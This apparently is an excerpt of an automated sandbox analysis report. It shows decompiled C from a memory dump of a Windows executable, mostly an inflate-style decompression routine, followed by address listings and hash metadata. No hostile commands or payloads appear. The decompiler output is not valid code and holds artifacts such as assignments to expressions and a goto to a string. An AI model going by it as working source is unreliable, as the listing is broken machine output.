                									switch( *((intOrPtr*)(_t367 * 4 +  &M004074B4))) {
                										case 0:
                											L101:
                											__eax = __esi[4] & 0x000000ff;
                											__esi[3] = __esi[4] & 0x000000ff;
                											__eax = __esi[5];
                											__esi[2] = __esi[5];
                											 *__esi = 1;
                											goto L102;
                										case 1:
                											L102:
                											__eax = __esi[3];
                											while(1) {
                												L105:
                												__eflags = __ebx - __eax;
                												if(__ebx >= __eax) {
                													break;
                												}
                												L103:
                												__eflags =  *(__ebp - 0x34);
                												if( *(__ebp - 0x34) == 0) {
                													goto L159;
                												}
                												L104:
                												__ecx =  *(__ebp - 0x38);
                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                												__ecx = __ebx;
                												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                												__ebx = __ebx + 8;
                												__eflags = __ebx;
                											}
                											L106:
                											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                											__eax = __eax &  *(__ebp - 0x40);
                											__ecx = __esi[2];
                											__eax = __esi[2] + __eax * 4;
                											__ecx =  *(__eax + 1) & 0x000000ff;
                											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                											__ecx =  *__eax & 0x000000ff;
                											__eflags = __ecx;
                											if(__ecx != 0) {
                												L108:
                												__eflags = __cl & 0x00000010;
                												if((__cl & 0x00000010) == 0) {
                													L110:
                													__eflags = __cl & 0x00000040;
                													if((__cl & 0x00000040) == 0) {
                														goto L125;
                													}
                													L111:
                													__eflags = __cl & 0x00000020;
                													if((__cl & 0x00000020) == 0) {
                														goto L9;
                													}
                													L112:
                													 *__esi = 7;
                													goto L157;
                												}
                												L109:
                												__esi[2] = __ecx;
                												__esi[1] = __eax;
                												 *__esi = 2;
                												goto L157;
                											}
                											L107:
                											__esi[2] = __eax;
                											 *__esi = 6;
                											goto L157;
                										case 2:
                											L113:
                											__eax = __esi[2];
                											while(1) {
                												L116:
                												__eflags = __ebx - __eax;
                												if(__ebx >= __eax) {
                													break;
                												}
                												L114:
                												__eflags =  *(__ebp - 0x34);
                												if( *(__ebp - 0x34) == 0) {
                													goto L159;
                												}
                												L115:
                												__ecx =  *(__ebp - 0x38);
                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                												__ecx = __ebx;
                												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                												__ebx = __ebx + 8;
                												__eflags = __ebx;
                											}
                											L117:
                											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                											__esi[1] = __esi[1] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                											__ecx = __eax;
                											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                											__ebx = __ebx - __eax;
                											__eflags = __ebx;
                											__eax = __esi[4] & 0x000000ff;
                											__esi[3] = __esi[4] & 0x000000ff;
                											__eax = __esi[6];
                											__esi[2] = __esi[6];
                											 *__esi = 3;
                											goto L118;
                										case 3:
                											L118:
                											__eax = __esi[3];
                											while(1) {
                												L121:
                												__eflags = __ebx - __eax;
                												if(__ebx >= __eax) {
                													break;
                												}
                												L119:
                												__eflags =  *(__ebp - 0x34);
                												if( *(__ebp - 0x34) == 0) {
                													goto L159;
                												}
                												L120:
                												__ecx =  *(__ebp - 0x38);
                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                												__ecx = __ebx;
                												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                												__ebx = __ebx + 8;
                												__eflags = __ebx;
                											}
                											L122:
                											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                											__eax = __eax &  *(__ebp - 0x40);
                											__ecx = __esi[2];
                											__eax = __esi[2] + __eax * 4;
                											__ecx =  *(__eax + 1) & 0x000000ff;
                											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                											__ecx =  *__eax & 0x000000ff;
                											__eflags = __cl & 0x00000010;
                											if((__cl & 0x00000010) == 0) {
                												L124:
                												__eflags = __cl & 0x00000040;
                												if((__cl & 0x00000040) != 0) {
                													goto L9;
                												}
                												L125:
                												__esi[3] = __ecx;
                												__ecx =  *(__eax + 2) & 0x0000ffff;
                												__esi[2] = __eax;
                												goto L157;
                											}
                											L123:
                											__esi[2] = __ecx;
                											__esi[3] = __eax;
                											 *__esi = 4;
                											goto L157;
                										case 4:
                											L126:
                											__eax = __esi[2];
                											while(1) {
                												L129:
                												__eflags = __ebx - __eax;
                												if(__ebx >= __eax) {
                													break;
                												}
                												L127:
                												__eflags =  *(__ebp - 0x34);
                												if( *(__ebp - 0x34) == 0) {
                													goto L159;
                												}
                												L128:
                												__ecx =  *(__ebp - 0x38);
                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                												__ecx = __ebx;
                												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                												__ebx = __ebx + 8;
                												__eflags = __ebx;
                											}
                											L130:
                											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                											__esi[3] = __esi[3] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                											__ecx = __eax;
                											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                											__eflags = __ebx;
                											 *__esi = 5;
                											goto L131;
                										case 5:
                											L131:
                											__eax =  *(__ebp - 0x30);
                											__edx = __esi[3];
                											_push(__esi);
                											__al = __al | 0x0000008b;
                											asm("enter 0xce2b, 0x81");
                											goto ("ndowPos");
                										case 6:
                											L133:
                											__eax =  *(__ebp - 0x2c);
                											__edi =  *(__ebp - 0x30);
                											__eflags = __eax;
                											if(__eax != 0) {
                												L149:
                												__cl = __esi[2];
                												 *__edi = __cl;
                												__edi = __edi + 1;
                												__eax = __eax - 1;
                												 *(__ebp - 0x30) = __edi;
                												 *(__ebp - 0x2c) = __eax;
                												goto L23;
                											}
                											L134:
                											__ecx = __esi[0x26e8];
                											__eflags = __edi - __ecx;
                											if(__edi != __ecx) {
                												L140:
                												__esi[0x26ea] = __edi;
                												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                												__edi = __esi[0x26ea];
                												__ecx = __esi[0x26e9];
                												__eflags = __edi - __ecx;
                												 *(__ebp - 0x30) = __edi;
                												if(__edi >= __ecx) {
                													__eax = __esi[0x26e8];
                													__eax = __esi[0x26e8] - __edi;
                													__eflags = __eax;
                												} else {
                													__ecx = __ecx - __edi;
                													__eax = __ecx - __edi - 1;
                												}
                												__edx = __esi[0x26e8];
                												__eflags = __edi - __edx;
                												 *(__ebp - 8) = __edx;
                												if(__edi == __edx) {
                													__edx =  &(__esi[0x6e8]);
                													__eflags = __ecx - __edx;
                													if(__ecx != __edx) {
                														__edi = __edx;
                														__eflags = __edi - __ecx;
                														 *(__ebp - 0x30) = __edi;
                														if(__edi >= __ecx) {
                															__eax =  *(__ebp - 8);
                															__eax =  *(__ebp - 8) - __edi;
                															__eflags = __eax;
                														} else {
                															__ecx = __ecx - __edi;
                															__eax = __ecx;
                														}
                													}
                												}
                												__eflags = __eax;
                												if(__eax == 0) {
                													goto L160;
                												} else {
                													goto L149;
                												}
                											}
                											L135:
                											__eax = __esi[0x26e9];
                											__edx =  &(__esi[0x6e8]);
                											__eflags = __eax - __edx;
                											if(__eax == __edx) {
                												goto L140;
                											}
                											L136:
                											__edi = __edx;
                											__eflags = __edi - __eax;
                											if(__edi >= __eax) {
                												__ecx = __ecx - __edi;
                												__eflags = __ecx;
                												__eax = __ecx;
                											} else {
                												__eax = __eax - __edi;
                												__eax = __eax - 1;
                											}
                											__eflags = __eax;
                											if(__eax != 0) {
                												goto L149;
                											} else {
                												goto L140;
                											}
                										case 7:
                											L150:
                											__eflags = __ebx - 7;
                											if(__ebx > 7) {
                												__ebx = __ebx - 8;
                												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
                												_t351 = __ebp - 0x38;
                												 *_t351 =  *(__ebp - 0x38) - 1;
                												__eflags =  *_t351;
                											}
                											goto L152;
                										case 8:
                											L4:
                											while(_t396 < 3) {
                												if( *(_t419 - 0x34) == 0) {
                													goto L159;
                												} else {
                													 *(_t419 - 0x34) =  *(_t419 - 0x34) - 1;
                													 *(_t419 - 0x40) =  *(_t419 - 0x40) | ( *( *(_t419 - 0x38)) & 0x000000ff) << _t396;
                													 *(_t419 - 0x38) =  &(( *(_t419 - 0x38))[1]);
                													_t396 = _t396 + 8;
                													continue;
                												}
                											}
                											_t396 = _t396 - 3;
                											 *(_t419 - 0x40) =  *(_t419 - 0x40) >> 3;
                											_t377 =  *(_t419 - 0x40) & 0x00000007;
                											asm("sbb ecx, ecx");
                											_t379 = _t377 >> 1;
                											_t417[0x145] = ( ~(_t377 & 0x00000001) & 0x00000007) + 8;
                											if(_t379 == 0) {
                												L24:
                												 *_t417 = 9;
                												_t407 = _t396 & 0x00000007;
                												 *(_t419 - 0x40) =  *(_t419 - 0x40) >> _t407;
                												_t396 = _t396 - _t407;
                												goto L157;
                											}
                											L6:
                											_t382 = _t379 - 1;
                											if(_t382 == 0) {
                												L13:
                												__eflags =  *0x432e90;
                												if( *0x432e90 != 0) {
                													L22:
                													_t383 =  *0x40a5e8; // 0x9
                													_t417[4] = _t383;
                													_t384 =  *0x40a5ec; // 0x5
                													_t417[4] = _t384;
                													_t385 =  *0x431d0c; // 0x0
                													_t417[5] = _t385;
                													_t386 =  *0x431d08; // 0x0
                													_t417[6] = _t386;
                													L23:
                													 *_t417 =  *_t417 & 0x00000000;
                													goto L157;
                												} else {
                													_t26 = _t419 - 8;
                													 *_t26 =  *(_t419 - 8) & 0x00000000;
                													__eflags =  *_t26;
                													_t387 = 0x431d10;
                													do {
                														L15:
                														__eflags = _t387 - 0x431f4c;
                														_t409 = 8;
                														if(_t387 > 0x431f4c) {
                															__eflags = _t387 - 0x432110;
                															if(_t387 >= 0x432110) {
                																__eflags = _t387 - 0x432170;
                																if(_t387 < 0x432170) {
                																	_t409 = 7;
                																}
                															} else {
                																_t409 = 9;
                															}
                														}
                														L20:
                														 *_t387 = _t409;
                														_t387 = _t387 + 4;
                														__eflags = _t387 - 0x432190;
                													} while (_t387 < 0x432190);
                													E0040755C(0x431d10, 0x120, 0x101, 0x4084e8, 0x408528, 0x431d0c, 0x40a5e8, 0x432610, _t419 - 8);
                													_push(0x1e);
                													_pop(_t411);
                													_push(5);
                													_pop(_t390);
                													memset(0x431d10, _t390, _t411 << 2);
                													_t421 = _t421 + 0xc;
                													_t413 = 0x431d10 + _t411;
                													E0040755C(0x431d10, 0x1e, 0, 0x408568, 0x4085a4, 0x431d08, 0x40a5ec, 0x432610, _t419 - 8);
                													 *0x432e90 =  *0x432e90 + 1;
                													__eflags =  *0x432e90;
                													goto L22;
                												}
                											}
                											L7:
                											_t394 = _t382 - 1;
                											if(_t394 == 0) {
                												 *_t417 = 0xb;
                												goto L157;
                											}
                											L8:
                											if(_t394 != 1) {
                												goto L157;
                											}
                											goto L9;
                										case 9:
                											while(1) {
                												L27:
                												__eflags = __ebx - 0x20;
                												if(__ebx >= 0x20) {
                													break;
                												}
                												L25:
                												__eflags =  *(__ebp - 0x34);
                												if( *(__ebp - 0x34) == 0) {
                													goto L159;
                												}
                												L26:
                												__eax =  *(__ebp - 0x38);
                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                												__ecx = __ebx;
                												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                												__ebx = __ebx + 8;
                												__eflags = __ebx;
                											}
                											L28:
                											__eax =  *(__ebp - 0x40);
                											__ebx = 0;
                											__eax =  *(__ebp - 0x40) & 0x0000ffff;
                											 *(__ebp - 0x40) = 0;
                											__eflags = __eax;
                											__esi[1] = __eax;
                											if(__eax == 0) {
                												goto L53;
                											}
                											L29:
                											_push(0xa);
                											_pop(__eax);
                											goto L54;
                										case 0xa:
                											L30:
                											__eflags =  *(__ebp - 0x34);
                											if( *(__ebp - 0x34) == 0) {
                												goto L159;
                											}
                											L31:
                											__eax =  *(__ebp - 0x2c);
                											__eflags = __eax;
                											if(__eax != 0) {
                												L48:
                												__eflags = __eax -  *(__ebp - 0x34);
                												if(__eax >=  *(__ebp - 0x34)) {
                													__eax =  *(__ebp - 0x34);
                												}
                												__ecx = __esi[1];
                												__eflags = __ecx - __eax;
                												__edi = __ecx;
                												if(__ecx >= __eax) {
                													__edi = __eax;
                												}
                												__eax = E00405FE8( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
                												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
                												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
                												_t80 =  &(__esi[1]);
                												 *_t80 = __esi[1] - __edi;
                												__eflags =  *_t80;
                												if( *_t80 == 0) {
                													L53:
                													__eax = __esi[0x145];
                													L54:
                													 *__esi = __eax;
                												}
                												goto L157;
                											}
                											L32:
                											__ecx = __esi[0x26e8];
                											__edx =  *(__ebp - 0x30);
                											__eflags = __edx - __ecx;
                											if(__edx != __ecx) {
                												L38:
                												__esi[0x26ea] = __edx;
                												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                												__edx = __esi[0x26ea];
                												__ecx = __esi[0x26e9];
                												__eflags = __edx - __ecx;
                												 *(__ebp - 0x30) = __edx;
                												if(__edx >= __ecx) {
                													__eax = __esi[0x26e8];
                													__eax = __esi[0x26e8] - __edx;
                													__eflags = __eax;
                												} else {
                													__ecx = __ecx - __edx;
                													__eax = __ecx - __edx - 1;
                												}
                												__edi = __esi[0x26e8];
                												 *(__ebp - 0x2c) = __eax;
                												__eflags = __edx - __edi;
                												if(__edx == __edi) {
                													__edx =  &(__esi[0x6e8]);
                													__eflags = __edx - __ecx;
                													if(__eflags != 0) {
                														 *(__ebp - 0x30) = __edx;
                														if(__eflags >= 0) {
                															__edi = __edi - __edx;
                															__eflags = __edi;
                															__eax = __edi;
                														} else {
                															__ecx = __ecx - __edx;
                															__eax = __ecx;
                														}
                														 *(__ebp - 0x2c) = __eax;
                													}
                												}
                												__eflags = __eax;
                												if(__eax == 0) {
                													goto L160;
                												} else {
                													goto L48;
                												}
                											}
                											L33:
                											__eax = __esi[0x26e9];
                											__edi =  &(__esi[0x6e8]);
                											__eflags = __eax - __edi;
                											if(__eax == __edi) {
                												goto L38;
                											}
                											L34:
                											__edx = __edi;
                											__eflags = __edx - __eax;
                											 *(__ebp - 0x30) = __edx;
                											if(__edx >= __eax) {
                												__ecx = __ecx - __edx;
                												__eflags = __ecx;
                												__eax = __ecx;
                											} else {
                												__eax = __eax - __edx;
                												__eax = __eax - 1;
                											}
                											__eflags = __eax;
                											 *(__ebp - 0x2c) = __eax;
                											if(__eax != 0) {
                												goto L48;
                											} else {
                												goto L38;
                											}
                										case 0xb:
                											goto L56;
                										case 0xc:
                											L60:
                											__esi[1] = __esi[1] >> 0xa;
                											__eax = (__esi[1] >> 0xa) + 4;
                											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                												goto L68;
                											}
                											goto L61;
                										case 0xd:
                											while(1) {
                												L93:
                												__eax = __esi[1];
                												__ecx = __esi[2];
                												__edx = __eax;
                												__eax = __eax & 0x0000001f;
                												__edx = __edx >> 5;
                												__eax = __edx + __eax + 0x102;
                												__eflags = __esi[2] - __eax;
                												if(__esi[2] >= __eax) {
                													break;
                												}
                												L73:
                												__eax = __esi[0x143];
                												while(1) {
                													L76:
                													__eflags = __ebx - __eax;
                													if(__ebx >= __eax) {
                														break;
                													}
                													L74:
                													__eflags =  *(__ebp - 0x34);
                													if( *(__ebp - 0x34) == 0) {
                														goto L159;
                													}
                													L75:
                													__ecx =  *(__ebp - 0x38);
                													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                													__ecx = __ebx;
                													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                													__ebx = __ebx + 8;
                													__eflags = __ebx;
                												}
                												L77:
                												__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                												__eax = __eax &  *(__ebp - 0x40);
                												__ecx = __esi[0x144];
                												__eax = __esi[0x144] + __eax * 4;
                												__edx =  *(__eax + 1) & 0x000000ff;
                												__eax =  *(__eax + 2) & 0x0000ffff;
                												__eflags = __eax - 0x10;
                												 *(__ebp - 0x14) = __eax;
                												if(__eax >= 0x10) {
                													L79:
                													__eflags = __eax - 0x12;
                													if(__eax != 0x12) {
                														__eax = __eax + 0xfffffff2;
                														 *(__ebp - 8) = 3;
                													} else {
                														_push(7);
                														 *(__ebp - 8) = 0xb;
                														_pop(__eax);
                													}
                													while(1) {
                														L84:
                														__ecx = __eax + __edx;
                														__eflags = __ebx - __eax + __edx;
                														if(__ebx >= __eax + __edx) {
                															break;
                														}
                														L82:
                														__eflags =  *(__ebp - 0x34);
                														if( *(__ebp - 0x34) == 0) {
                															goto L159;
                														}
                														L83:
                														__ecx =  *(__ebp - 0x38);
                														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                														__ecx = __ebx;
                														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                														__ebx = __ebx + 8;
                														__eflags = __ebx;
                													}
                													L85:
                													__ecx = __edx;
                													__ebx = __ebx - __edx;
                													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                													 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                													__edx =  *(__ebp - 8);
                													__ebx = __ebx - __eax;
                													__edx =  *(__ebp - 8) + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                													__ecx = __eax;
                													__eax = __esi[1];
                													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                													__ecx = __esi[2];
                													__eax = __eax >> 5;
                													__edi = __eax >> 0x00000005 & 0x0000001f;
                													__eax = __eax & 0x0000001f;
                													__eax = __edi + __eax + 0x102;
                													__edi = __edx + __ecx;
                													__eflags = __edx + __ecx - __eax;
                													if(__edx + __ecx > __eax) {
                														goto L9;
                													}
                													L86:
                													__eflags =  *(__ebp - 0x14) - 0x10;
                													if( *(__ebp - 0x14) != 0x10) {
                														L89:
                														__edi = 0;
                														__eflags = 0;
                														L90:
                														__eax = __esi + 0xc + __ecx * 4;
                														do {
                															L91:
                															 *__eax = __edi;
                															__ecx = __ecx + 1;
                															__eax = __eax + 4;
                															__edx = __edx - 1;
                															__eflags = __edx;
                														} while (__edx != 0);
                														__esi[2] = __ecx;
                														continue;
                													}
                													L87:
                													__eflags = __ecx - 1;
                													if(__ecx < 1) {
                														goto L9;
                													}
                													L88:
                													__edi =  *(__esi + 8 + __ecx * 4);
                													goto L90;
                												}
                												L78:
                												__ecx = __edx;
                												__ebx = __ebx - __edx;
                												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                												__ecx = __esi[2];
                												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                												__esi[2] = __esi[2] + 1;
                											}
                											L94:
                											__eax = __esi[1];
                											__esi[0x144] = __esi[0x144] & 0x00000000;
                											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                											__edi = __eax;
                											__eax = __eax >> 5;
                											__edi = __edi & 0x0000001f;
                											__ecx = 0x101;
                											__eax = __eax & 0x0000001f;
                											__edi = __edi + 0x101;
                											__eax = __eax + 1;
                											__edx = __ebp - 0xc;
                											 *(__ebp - 0x14) = __eax;
                											 &(__esi[0x148]) = __ebp - 4;
                											 *(__ebp - 4) = 9;
                											__ebp - 0x18 =  &(__esi[3]);
                											 *(__ebp - 0x10) = 6;
                											__eax = E0040755C( &(__esi[3]), __edi, 0x101, 0x4084e8, 0x408528, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                											__eflags =  *(__ebp - 4);
                											if( *(__ebp - 4) == 0) {
                												__eax = __eax | 0xffffffff;
                												__eflags = __eax;
                											}
                											__eflags = __eax;
                											if(__eax != 0) {
                												goto L9;
                											} else {
                												L97:
                												__ebp - 0xc =  &(__esi[0x148]);
                												__ebp - 0x10 = __ebp - 0x1c;
                												__eax = __esi + 0xc + __edi * 4;
                												__eax = E0040755C(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x408568, 0x4085a4, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                												__eflags = __eax;
                												if(__eax != 0) {
                													goto L9;
                												}
                												L98:
                												__eax =  *(__ebp - 0x10);
                												__eflags =  *(__ebp - 0x10);
                												if( *(__ebp - 0x10) != 0) {
                													L100:
                													__cl =  *(__ebp - 4);
                													 *__esi =  *__esi & 0x00000000;
                													__eflags =  *__esi;
                													__esi[4] = __al;
                													__eax =  *(__ebp - 0x18);
                													__esi[5] =  *(__ebp - 0x18);
                													__eax =  *(__ebp - 0x1c);
                													__esi[4] = __cl;
                													__esi[6] =  *(__ebp - 0x1c);
                													goto L101;
                												}
                												L99:
                												__eflags = __edi - 0x101;
                												if(__edi > 0x101) {
                													goto L9;
                												}
                												goto L100;
                											}
                										case 0xe:
                											goto L9;
                										case 0xf:
                											L152:
                											__eax =  *(__ebp - 0x30);
                											__esi[0x26ea] =  *(__ebp - 0x30);
                											__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                											__ecx = __esi[0x26ea];
                											__edx = __esi[0x26e9];
                											__eflags = __ecx - __edx;
                											 *(__ebp - 0x30) = __ecx;
                											if(__ecx >= __edx) {
                												__eax = __esi[0x26e8];
                												__eax = __esi[0x26e8] - __ecx;
                												__eflags = __eax;
                											} else {
                												__edx = __edx - __ecx;
                												__eax = __edx - __ecx - 1;
                											}
                											__eflags = __ecx - __edx;
                											 *(__ebp - 0x2c) = __eax;
                											if(__ecx != __edx) {
                												L160:
                												__edi = 0;
                												goto L10;
                											} else {
                												L156:
                												__eax = __esi[0x145];
                												__eflags = __eax - 8;
                												 *__esi = __eax;
                												if(__eax != 8) {
                													L161:
                													0 = 1;
                													goto L10;
                												}
                												goto L157;
                											}
                									}
                								}
                								L158:
                								goto L9;
                							}
                							L70:
                							if( *__edi == __eax) {
                								goto L72;
                							}
                							L71:
                							__esi[2] = __esi[2] & __eax;
                							 *__esi = 0xd;
                							goto L93;
                						}
                					}
                				}
                				L159:
                				_t414 = 0;
                				_t417[0x147] =  *(_t419 - 0x40);
                				_t417[0x146] = _t396;
                				( *(_t419 + 8))[1] = 0;
                				goto L11;
                			}









                0x004070ae
                0x00000000
                0x004070ae
                0x0040708d
                0x0040708d
                0x00407093
                0x00000000
                0x00000000
                0x00000000
                0x00407093
                0x00000000
                0x00000000
                0x00000000
                0x00407432
                0x00407432
                0x00407438
                0x0040743e
                0x00407443
                0x00407449
                0x0040744f
                0x00407451
                0x00407454
                0x0040745d
                0x00407463
                0x00407463
                0x00407456
                0x00407458
                0x0040745a
                0x0040745a
                0x00407465
                0x00407467
                0x0040746a
                0x004074a5
                0x004074a5
                0x00000000
                0x0040746c
                0x0040746c
                0x0040746c
                0x00407472
                0x00407475
                0x00407477
                0x004074ac
                0x004074ae
                0x00000000
                0x004074ae
                0x00000000
                0x00407477
                0x00000000
                0x00406ab6
                0x00407484
                0x00000000
                0x00407484
                0x00406e98
                0x00406e9a
                0x00000000
                0x00000000
                0x00406e9c
                0x00406e9c
                0x00406e9f
                0x00000000
                0x00406e9f
                0x00406de4
                0x00406da5
                0x00407489
                0x0040748c
                0x0040748e
                0x00407497
                0x0040749d
                0x00000000

                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                • Instruction ID: 3db1d01f4341fbbb805040525b4c18df43ce82c239752998d09602440244d977
                • Opcode Fuzzy Hash: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                • Instruction Fuzzy Hash: FEE18A71A0070ADFCB24CF59D880BAABBF5FB44305F15852EE496A72D1D338AA91CF45
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040755C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                				signed int _v8;
                				unsigned int _v12;
                				signed int _v16;
                				intOrPtr _v20;
                				signed int _v24;
                				signed int _v28;
                				intOrPtr* _v32;
                				signed int* _v36;
                				signed int _v40;
                				signed int _v44;
                				intOrPtr _v48;
                				intOrPtr _v52;
                				void _v116;
                				signed int _v176;
                				signed int _v180;
                				signed int _v240;
                				signed int _t166;
                				signed int _t168;
                				intOrPtr _t175;
                				signed int _t181;
                				void* _t182;
                				intOrPtr _t183;
                				signed int* _t184;
                				signed int _t186;
                				signed int _t187;
                				signed int* _t189;
                				signed int _t190;
                				intOrPtr* _t191;
                				intOrPtr _t192;
                				signed int _t193;
                				signed int _t195;
                				signed int _t200;
                				signed int _t205;
                				void* _t207;
                				short _t208;
                				signed char _t222;
                				signed int _t224;
                				signed int _t225;
                				signed int* _t232;
                				signed int _t233;
                				signed int _t234;
                				void* _t235;
                				signed int _t236;
                				signed int _t244;
                				signed int _t246;
                				signed int _t251;
                				signed int _t254;
                				signed int _t256;
                				signed int _t259;
                				signed int _t262;
                				void* _t263;
                				void* _t264;
                				signed int _t267;
                				intOrPtr _t269;
                				intOrPtr _t271;
                				signed int _t274;
                				intOrPtr* _t275;
                				unsigned int _t276;
                				void* _t277;
                				signed int _t278;
                				intOrPtr* _t279;
                				signed int _t281;
                				intOrPtr _t282;
                				intOrPtr _t283;
                				signed int* _t284;
                				signed int _t286;
                				signed int _t287;
                				signed int _t288;
                				signed int _t296;
                				signed int* _t297;
                				intOrPtr _t298;
                				void* _t299;
                
                				_t278 = _a8;
                				_t187 = 0x10;
                				memset( &_v116, 0, _t187 << 2);
                				_t189 = _a4;
                				_t233 = _t278;
                				do {
                					_t166 =  *_t189;
                					_t189 =  &(_t189[1]);
                					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                					_t233 = _t233 - 1;
                				} while (_t233 != 0);
                				if(_v116 != _t278) {
                					_t279 = _a28;
                					_t267 =  *_t279;
                					_t190 = 1;
                					_a28 = _t267;
                					_t234 = 0xf;
                					while(1) {
                						_t168 = 0;
                						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                							break;
                						}
                						_t190 = _t190 + 1;
                						if(_t190 <= _t234) {
                							continue;
                						}
                						break;
                					}
                					_v8 = _t190;
                					if(_t267 < _t190) {
                						_a28 = _t190;
                					}
                					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                						_t234 = _t234 - 1;
                						if(_t234 != 0) {
                							continue;
                						}
                						break;
                					}
                					_v28 = _t234;
                					if(_a28 > _t234) {
                						_a28 = _t234;
                					}
                					 *_t279 = _a28;
                					_t181 = 1 << _t190;
                					while(_t190 < _t234) {
                						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                						if(_t182 < 0) {
                							L64:
                							return _t168 | 0xffffffff;
                						}
                						_t190 = _t190 + 1;
                						_t181 = _t182 + _t182;
                					}
                					_t281 = _t234 << 2;
                					_t191 = _t299 + _t281 - 0x70;
                					_t269 =  *_t191;
                					_t183 = _t181 - _t269;
                					_v52 = _t183;
                					if(_t183 < 0) {
